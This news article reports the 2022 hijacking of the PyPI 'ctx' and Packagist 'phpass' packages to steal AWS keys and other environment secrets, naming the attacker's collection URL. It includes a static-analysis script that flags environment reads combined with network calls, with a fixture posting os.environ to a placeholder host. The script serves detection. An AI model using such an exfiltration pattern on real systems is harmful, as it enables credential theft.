Python libraries are under attack by AWS keys

When a GitHub repository that hasn't been touched for nearly a decade suddenly receives an "update," users should be wary: it may simply be a hostile takeover intended to distribute malware.

This is exactly what happened with the PyPI "ctx" module, which apparently has millions of downloads. Earlier this month, in a software supply chain attack, someone replaced the legitimate "ctx" code with a version that reads the developer's environment variables and harvests secrets such as Amazon AWS keys and credentials.

These were then sent to a Heroku endpoint at https://anti-theft-web.herokuapp.com/hacked/.
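The behaviour described above, environment variable reads combined with an outbound HTTP request, is something a reviewer can look for before trusting a freshly "updated" package. The script below is an added example, not code from the ctx package or from BleepingComputer's analysis. It parses a Python source file with the standard `ast` module, resolves import aliases (`import requests as r`, `from os import environ`), and flags a file only when it both reads the environment and calls a known network sender; either behaviour alone is normal for configuration loaders or update checkers. The three fixtures are constructed, and `https://collector.example.invalid/submit` is a placeholder, not a real endpoint.

```python
"""Static triage for the ctx-style pattern: environment reads + network egress."""
import ast
import re
from dataclasses import dataclass, field

# Fully qualified names that read the process environment.
ENV_READERS = ("os.environ", "os.getenv", "os.environb")
# Fully qualified callables that open outbound network connections.
NET_SENDERS = {
    "requests.get", "requests.post", "requests.put", "requests.request",
    "urllib.request.urlopen", "urllib.request.Request",
    "http.client.HTTPConnection", "http.client.HTTPSConnection",
    "socket.socket", "socket.create_connection",
}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


@dataclass
class Findings:
    env_lines: list = field(default_factory=list)  # lines that read env vars
    net_calls: list = field(default_factory=list)  # (line, qualified callee)
    urls: list = field(default_factory=list)       # hard-coded URL literals

    def suspicious(self) -> bool:
        # Env access alone (config) or network alone (updater) is routine;
        # the combination is what the ctx payload exhibited.
        return bool(self.env_lines) and bool(self.net_calls)


def _dotted(node: ast.AST):
    """Turn an `a.b.c` attribute chain into the string 'a.b.c' (else None)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _collect_aliases(tree: ast.AST) -> dict:
    """Map local names to fully qualified names so aliases still resolve."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                local = a.asname or a.name.split(".")[0]
                aliases[local] = a.name if a.asname else local
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _resolve(dotted: str, aliases: dict) -> str:
    head, _, rest = dotted.partition(".")
    head = aliases.get(head, head)
    return f"{head}.{rest}" if rest else head


def scan_source(source: str) -> Findings:
    """Scan one Python source file and report env reads, network calls and URLs."""
    tree = ast.parse(source)
    aliases = _collect_aliases(tree)
    found = Findings()
    env_lines = set()
    for node in ast.walk(tree):
        if isinstance(node, (ast.Attribute, ast.Name)):
            name = _dotted(node)
            if name and _resolve(name, aliases).startswith(ENV_READERS):
                env_lines.add(node.lineno)
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name and _resolve(name, aliases) in NET_SENDERS:
                found.net_calls.append((node.lineno, _resolve(name, aliases)))
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            found.urls.extend(URL_RE.findall(node.value))
    found.env_lines = sorted(env_lines)
    return found


# Constructed fixtures (not code from the ctx package): one mimics the
# described behaviour in miniature, two are benign look-alikes.
SUSPECT = """
import os
import requests

def report():
    payload = dict(os.environ)
    requests.post("https://collector.example.invalid/submit", json=payload)
"""

BENIGN_CONFIG = """
from os import environ
def home():
    return environ.get("HOME", "/tmp")
"""

BENIGN_UPDATER = """
import urllib.request
def latest():
    return urllib.request.urlopen("https://example.invalid/version").read()
"""

if __name__ == "__main__":
    for label, src in [("suspect", SUSPECT), ("config", BENIGN_CONFIG),
                       ("updater", BENIGN_UPDATER)]:
        f = scan_source(src)
        print(f"{label:8} suspicious={f.suspicious()} env={f.env_lines} "
              f"net={f.net_calls} urls={f.urls}")
```

Run against an unpacked sdist or wheel (`for f in pkg/**/*.py`), the script gives a shortlist for manual review rather than a verdict; a benign package can legitimately do both things, and a determined author can obfuscate past any AST pattern, so treat a hit as a reason to read the diff against the previous release.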

The attack, first detected by BleepingComputer, resulted in some 20,000 downloads of the malicious versions.

In addition to "ctx", versions of "phpass" published on Packagist, the PHP package repository used by Composer, were "updated" in the same way. That package, too, has millions of downloads.

ctx is a Python module that was last updated in 2014. Eight years later, on May 15, it was updated with malicious code, as spotted by users on Reddit and later confirmed by ethical hackers. PHPass, for its part, is an open-source password hashing framework released in 2005 and downloaded more than two million times to date.

PyPI removed the malicious builds hours after they were uploaded, but by then the damage was said to have been done. The damage from the PHPass compromise was far more limited, the researchers added.

Investigators say both attacks were carried out by the same person, whose identity is "obvious", but are refraining from naming them until more details come to light.

Researchers call this type of attack "repo jacking", and these are not the first examples. Earlier this year, the popular npm libraries ua-parser-js, coa, and rc were hijacked to deliver cryptocurrency miners and information stealers to their victims.

Via: BleepingComputer